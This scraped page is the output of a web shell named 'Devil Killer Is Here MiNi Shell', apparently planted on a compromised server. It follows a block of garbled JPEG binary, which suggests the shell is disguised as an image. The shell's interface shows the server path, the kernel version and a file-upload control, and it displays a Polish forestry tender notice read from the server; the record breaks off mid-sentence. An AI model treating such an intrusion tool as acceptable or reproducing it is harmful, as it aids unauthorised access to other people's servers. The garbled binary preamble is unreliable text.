JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20230728/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20230728/0033156801-N-2023.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Wykonanie deszczowni stałej na Szkółce leśnej </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Nadleśnictwo Rudnik</span></h3> <h3 class="mb-0">1.3.) Oddział zamawiającego: <span class="normal">Nadleśnictwo Rudnik</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 830017720</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Rzeszowska 198</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Rudnik nad Sanem</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">37-420</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">podkarpackie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL824 - Tarnobrzeski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">158766211</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">rudnik@lublin.lasy.gov.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://ezamowienia.gov.pl/pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - inna państwowa jednostka organizacyjna nieposiadająca osobowości prawnej</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Środowisko</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Wykonanie deszczowni stałej na Szkółce leśnej </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-55d3f3cf-2c7a-11ee-9aa3-96d3b4440790</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2023/BZP 00331568</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2023-07-28</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2023/BZP 00207020/02/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.2 Wykonanie deszczowni stałej na szkółce z montażem zbiorników</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-55d3f3cf-2c7a-11ee-9aa3-96d3b4440790 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://ezamowienia.gov.pl/mp client/tenders/ocds-148610-55d3f3cf-2c7a-11ee-9aa3-96d3b4440790<br/>strona internetowa prowadzonego postępowania (link prowadzący bezpośrednio do widoku postępowania na Platformie e Zamówienia) (adres strony internetowej, na której udostępniane będą zmiany i wyjaśnienia treści niniejszej specyfikacji warunków zamówienia („SWZ”) oraz inne dokumenty zamówienia bezpośrednio związane z postępowaniem o udzielenie zamówienia)<br/>e-mail: rudnik@lublin.lasy.gov.pl (za wyjątkiem oferty)</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Komunikacja między Zamawiającym, a<br/>Wykonawcami odbywa się przy użyciu Platformy e-Zamówienia („Platforma”), która jest dostępna pod adresem:<br/>https://ezamowienia.gov.pl oraz poczty elektronicznej, z zastrzeżeniem, że złożenie oferty następuje wyłącznie przy użyciu<br/>Platformy.Sposób sporządzenia i przekazywania info. oraz wymagań tech. dla dokumentów elektronicznych oraz środków<br/>komunikacji elektronicznej<br/>musi być zgody z wymaganiami określonymi w rozporządzeniu P.Rady Min. z dn.30.12.2020r. w sprawie sposobu sporządzania i<br/>przekazywania informacji oraz wymagań technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w<br/>postępowaniu o udzielenie zamówienia publicznego lub konkursie (Dz. U. 2020 poz.2452). Oferta wyłącznie na Platformie e Zamówienia. Wykonawca zamierzający wziąć udział w niniejszym postępowaniu o udzielenie zamówienia publicznego, musi posiadać konto podmiotu „Wykonawca” na Platformie. Szczegółowe informacje na temat zakładania kont podmiotów oraz zasady i<br/>warunki korzystania z Platformy, w tym minimalne wymagania techniczne dotyczące sprzętu używanego w celu korzystania z usług<br/>Platformy oraz informacje dotyczące specyfikacji połączenia określa „Regulamin korzystania z Platformy e-Zamówienia”, dostępny<br/>pod adresem: https://ezamowienia.gov.pl/pl/regulamin/</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Zamawiający dopuszcza dołączenie katalogu elektronicznego do oferty</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Stosownie do art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE)<br/>2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie<br/>swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych osobowych)<br/>(Dz. Urz. UE L Ogłoszenie nr z dnia Biuletyn Zamówień Publicznych Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie<br/>podstawowym na podstawie: art. 275 pkt 1 ustawy - Roboty budowlane 119 z 04 maja 2016 r., str. 1 – „RODO”) Zamawiający informuje, iż administratorem danych osobowych jest Nadleśnictwo Rudnik z siedzibą ul. Rzeszowska 198, 37-420 Rudnik nad Sanem . Nadleśnictwo Rudnik nie powołało Inspektora ochrony danych, jednak w sprawach ochrony danych może się Pan/Pani<br/>skontaktować z administratorem danych pisząc na adres e-mail: rudnik@lublin.lasy.gov.pl lub dzwoniąc na nr telefonu: 15 8766211. Informacje szczegółowe zawiera SWZ</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">S.270.6.2023</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.5.) Wartość zamówienia: <span class="normal"> 3187623,90 PLN </span> </h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.14.) Określenie aspektów społecznych, środowiskowych lub etykiet w opisie przedmiotu zamówienia: </h3> <p class="mb-0">Zamawiający określił wymagania dotyczące wydajności lub funkcjonalności, zgodnie z art. 101 ust. 1 ustawy</p><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest wykonanie pełnego i kompleksowego zakresu robót <br/>budowlanych i instalacyjnych dotyczących zadania pod nazwą „Wykonanie deszczowni <br/>stałej na Szkółce Leśnej”.<br/>1) Szczegółowy opis przedmiotu zamówienia określają odpowiednio: przedmiar robót, <br/>dokumentacja projektowo- techniczna i specyfikacja techniczna wykonania i odbioru <br/>robót budowlanych, które stanowią załączniki do niniejszej SWZ:<br/>- Przedmiar robót– załącznik nr 1a-1c,<br/>- Specyfikacja techniczna wykonania i odbioru robót budowlanych (STWiORB) załącznik <br/>nr 2 a-2c,<br/>- Dokumentacja projektowo-techniczna- załącznik nr 3, 3a-3d (projekt wykonawczy)<br/>Wykonawca udzieli na wykonany przedmiot umowy nieodpłatnej gwarancji jakości na okres <br/>nie krótszy niż 60 miesięcy licząc od dnia końcowego odbioru robót. Odpowiedzialność z tytułu <br/>rękojmi za wady fizyczne wykonawca będzie ponosił na zasadach określonych w kodeksie <br/>cywilnym /5 lat/ </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45232121-6 - Roboty budowlane w zakresie rurociągów nawadniających</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45332200-5 - Roboty instalacyjne hydrauliczne</p> <p class="mb-0">45332400-7 - Roboty instalacyjne w zakresie urządzeń sanitarnych</p> <p class="mb-0">45233250-6 - Roboty w zakresie nawierzchni, z wyjątkiem dróg</p> <p class="mb-0">45233140-2 - Roboty drogowe</p> <p class="mb-0">45310000-3 - Roboty instalacyjne elektryczne</p> <p class="mb-0">45232000-2 - Roboty pomocnicze w zakresie rurociągów i kabli</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">105 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.14.) Przedmiot, wielkość lub zakres oraz warunki zamówień na podobne usługi lub roboty budowlane: <span class="normal">5.1. Zamawiający przewiduje możliwość udzielenia zamówień, o których mowa w art. 214 ust. 1 <br/>pkt 7 PZP, w okresie 3 lat od dnia udzielenia zamówienia podstawowego. Zamówienia te <br/>polegać będą na powtórzeniu robót budowlanych podobnych do robót budowlanych <br/>stanowiących przedmiot niniejszego zamówienia.<br/>5.2. Zamówienia, o których mowa będą polegały na powtórzeniu robót budowlanych zgodnych z <br/>robotami stanowiącymi przedmiot niniejszego zamówienia oraz robotami budowlanymi <br/>podobnymi do nich w aspekcie technologicznym ich wykonawstwa. Zakresem rzeczowym <br/>robót budowlanych stanowiących przedmiot zamówień, o których mowa objęte będą prace <br/>obejmujące czynności wskazane rodzajowo w załączniku do SWZ.<br/>5.3 Zakres rzeczowy robót budowlanych stanowiących przedmiot zamówień, o których mowa nie <br/>przekroczy wartości 25 % wartości niniejszego zamówienia.<br/>5.4. Zamówienia, o których mowa będą udzielane po przeprowadzeniu odrębnego postępowania <br/>o udzielenie zamówienia publicznego w trybie zamówienia z wolnej ręki.</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy wyborze oferty Zamawiający będzie się kierował następującymi kryteriami oceny ofert:<br/>1) Cena – z wagą 60 %,<br/>2) Skrócenie terminu wykonania zamówienia – z wagą 40%</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Skrócenie terminu wykonania zamówienia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 1</p> <p class="mb-0">Art. 109 ust. 1 pkt 2 lit a</p> <p class="mb-0">Art. 109 ust. 1 pkt 2 lit b</p> <p class="mb-0">Art. 109 ust. 1 pkt 2 lit c</p> <p class="mb-0">Art. 109 ust. 1 pkt 3</p> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <p class="mb-0">Art. 109 ust. 1 pkt 8</p> <p class="mb-0">Art. 109 ust. 1 pkt 9</p> <p class="mb-0">Art. 109 ust. 1 pkt 10</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 7.1. W postępowaniu mogą brać udział Wykonawcy, którzy spełniają warunki udziału w <br/>postępowaniu dotyczące:<br/>1) sytuacji ekonomicznej lub finansowej.<br/> Zamawiający nie stawia szczególnych wymagań w zakresie opisu spełniania warunku <br/>udziału w postępowaniu w odniesieniu do warunku dot. zdolności ekonomicznej. Warunek w odniesieniu do sytuacji finansowej, zostanie spełniony, jeśli Wykonawca wykaże, że posiada środki finansowe lub zdolność kredytową nie mniejszą niż: 800 000 zł.<br/>2) zdolności technicznej lub zawodowej.<br/>a) Warunek ten, w zakresie doświadczenia, zostanie uznany za spełniony, jeśli Wykonawca wykaże, że w okresie ostatnich 5 lat od dnia w którym upływa <br/>termin składania ofert (a jeżeli okres prowadzenia działalności jest krótszy –w tym okresie): zrealizował (ukończył) co najmniej dwie roboty budowlane<br/>odpowiadające swoim rodzajem robotom budowlanym stanowiącym przedmiot zamówienia (polegające na budowie lub przebudowie lub <br/>rozbudowie systemu nawadniania (deszczowni na szkółce leśnej wraz z infrastrukturą towarzyszącą) o wartości co najmniej: 1 000 000,00 zł brutto<br/>każda, odpowiednio potwierdzona, że została wykonana w sposób należyty.Warunek ten, w zakresie osób skierowanych przez wykonawcę do realizacji zamówienia, zostanie uznany za spełniony, jeśli Wykonawca wykaże, że <br/>dysponuje lub będzie dysponować: na czas realizacji zamówienia, co najmniej:<br/> - jedną osobą odpowiedzialną za kierowanie robotami budowlanymi (kierownik budowy) posiadającą uprawnienia budowlane do sprawowania <br/>samodzielnych funkcji technicznych w budownictwie zgodnie z ustawą z dnia 7 lipca 1994 r. Prawo budowlane (tekst jedn. Dz. U. 2020 poz. 1133) i <br/>rozporządzeniem Ministra Inwestycji i Rozwoju z dnia 29 kwietnia 2019 r. w sprawie przygotowania zawodowego do wykonywania samodzielnych funkcji <br/>technicznych w budownictwie (Dz. U. z 2019 r. poz. 831) w specjalności konstrukcyjno-budowlanej lub odpowiadające im ważne uprawnienia <br/>budowlane wydane na podstawie przepisów obowiązujących w chwili ich uzyskania, a które uprawniają do pełnienia funkcji kierownika budowy przy wykonywaniu robót budowlanych objętych przedmiotem zamówienia, <br/>posiadający minimum 5-letnie doświadczenie przy pełnieniu samodzielnych funkcji technicznych w budownictwie na stanowisku kierownika budowy lub <br/>robót lub inspektora nadzoru inwestorskiego dla co najmniej jednej robotybudowlanej w zakresie systemu nawadniania (deszczowni).<br/> - po jednej osobie uprawnionej zgodnie z wymogami ustawy Prawo budowlane do pełnienia samodzielnych funkcji technicznych w budownictwie <br/>bez ograniczeń, tj.:<br/> b2) kierownik robót w specjalności w specjalności instalacyjno-inżynieryjnej w zakresie instalacji sanitarnych lub odpowiadające im równoważne uprawnienia budowlane do kierowania robotami budowlanymi, które zostały wydane na podstawie wcześniej obowiązujących przepisów w zakresie niezbędnym do realizacji zamówienia <br/> b3) kierownik robót w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych lub odpowiadające im równoważne uprawnienia budowlane do kierowania robotami budowlanymi, które zostały wydane na podstawie wcześniej obowiązujących przepisów w zakresie niezbędnym do realizacji zamówienia, Zamawiający wymaga od osób wymienionych ppkt b2), b3) które będą uczestniczyć w wykonywaniu zamówienia, minimum 3-letnie doświadczenie zawodowe przy pełnieniu samodzielnych funkcji technicznych w budownictwie na stanowisku kierownika budowy lub robót lub inspektora nadzoru inwestorskiego dla danej specjalności.Zamawiający, na zasadach określonych w ustawie z dnia 22 grudnia 2015 r. o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich <br/>Unii Europejskiej (Dz.U. 2020 poz. 220), uzna obywatelom państw członkowskich Unii <br/>Europejskiej, Konfederacji Szwajcarskiej lub państw członkowskich Europejskiego <br/>Porozumienia o Wolnym Handlu (EFTA) - stron umowy o Europejskim Obszarze Gospodarczym, którzy nabyli w tych państwach, poza granicami Rzeczypospolitej Polskiej, kwalifikacje zawodowe wymagane na ww. stanowisko, jeżeli kwalifikacje te <br/>swym zakresem będą odpowiadały uprawnieniom opisanym powyżej umożliwiając pełnienie funkcji kierownika budowy przy wykonywaniu robót budowlanych objętych przedmiotem zamówienia. Ocena spełniania warunków udziału w postępowaniu dokonana zostanie zgodnie z formułą <br/>„spełnia”/„nie spełnia”, w oparciu o informacje zawarte w dokumentach i oświadczeniach, o <br/>których mowa w rozdziale 9 SWZ. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. Żaden z Wykonawców <br/>wspólnie ubiegających się o udzielenie zamówienia nie może podlegać wykluczeniu z <br/>postępowania. W przypadku Wykonawców wspólnie ubiegających się o udzielenie <br/>zamówienia warunki udziału w postępowaniu określone w pkt 7.1. powinni spełniać łącznie <br/>wszyscy Wykonawcy, z zastrzeżeniem, iż warunek opisany w pkt 7.1. ppkt 2) lit. a) winien spełniać co najmniej jeden z tych Wykonawców. W odniesieniu do warunków dotyczących doświadczenia Wykonawcy wspólnie ubiegający <br/>się o udzielenie zamówienia mogą polegać na zdolnościach tych Wykonawców, którzy <br/>wykonają dostawy, do realizacji których te zdolności są wymagane. W przypadku, o którym <br/>mowa w pkt 7.1. ppkt 2) SWZ, Wykonawcy wspólnie ubiegający się o udzielenie zamówienia <br/>dołączają do oferty oświadczenie, z którego wynika, które roboty budowlane lub usługi<br/>wykonają poszczególni Wykonawcy. Oceniając zdolność techniczną lub zawodową Wykonawcy, Zamawiający działając na podstawie art. 116 ust. 2 PZP może, na każdym etapie postępowania, uznać, że wykonawca nie posiada wymaganych zdolności, jeżeli posiadanie przez wykonawcę sprzecznych interesów, w szczególności zaangażowanie zasobów technicznych lub zawodowych wykonawcy w inne przedsięwzięcia gospodarcze wykonawcy może mieć negatywny wpływ na realizację zamówienia <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Wykonawca będzie obowiązany złożyć w terminie nie krótszym niż<br/>5dni,:aktualne na dzień ich złożenia. -oświadczenie Wyk. o którym mowa w art.125 ust.1 PZP<br/>potwierdzające brak podstaw wykluczenia i spełnienie warunków udziału w postępowania, na dzień składania ofert, które stanowidowód tymczasowo zastępujący wymagane przez Zamawiającego<br/>podmiotowe środki dowodowe (zał nr 4 do SWZ)-informację z Krajowego Rejestru Karnego w zakresie:<br/>(a) art. 108 ust. 1 pkt 1 i 2 PZP,(b)art. 108 ust. 1 pkt 4 PZP, odnośnie do orzeczenia zakazu ubiegania<br/>się o zamówienie publiczne tytułem środka karnego, (c) art. 109 ust. 1 pkt 2 lit a) PZP, (d) art. 109 ust. 1<br/>pkt 2 lit b) PZP, odnośniedo ukarania za wykroczenie, za które wymierzono karę aresztu, (e) art. 109<br/>ust. 1 pkt 3 PZP, odnośnie do skazania za przestępstwo lub ukarano za wykroczenie, za które<br/>wymierzona karę aresztu -sporządzonej nie wcześniej niż 6 m-cy przed jej złożeniem,-h)oświadczenie<br/>Wyk., w zakresie art. 108ust. 1 pkt 5 PZP, o braku przynależności do tej samej grupy kapitałowej, w<br/>rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów (tekst jedn. Dz.U. 2021 poz. 275 ), z innym Wyk, który złożył odrębną ofertę albo oświadczenie o przynależności do tej samej grupy kapitałowej wraz z dok. lub informacjami potwierdzającymi przygotowanie oferty niezależnie od innego Wyk. należącegodo tej samej gr. kapit.-oświad Wyk. w zakresie art. 108 ust. 1 pkt 5 PZP o przynależności lub braku przynależności do tej grupy kapitałowej-zał nr 11 do<br/>SWZ),i)zaświadczenie właściwego naczelnika US potwierdzające, że Wyk.nie zalega z opłacaniem<br/>podatków i opłat, w zakresie art. 109 ust. 1 pkt 1) PZP, wystawione nie wcześniej niż 3 m-ce przed jego<br/>złożeniem, a w przypadku zalegania z opłaceniem podatków i opłat wraz z zaświad. dokumenty<br/>potwierdzające, że przed upływem terminu składania ofert Wyk. dokonał płatności należnych podatków<br/>wraz z odsetkami lub grzywnami lub zawarł wiążące porozumienie w sprawie spłat tych należności,-j)<br/>zaświadczenie właściwej terenowej jednostki organizacyjnej ZUS lub KRUS albo inny<br/>dok.potwierdzający, że wyk. nie zalega z opłacaniem składek na ubezpieczenia społeczne lub<br/>zdrowotne, w zakresie art. 109 ust. 1 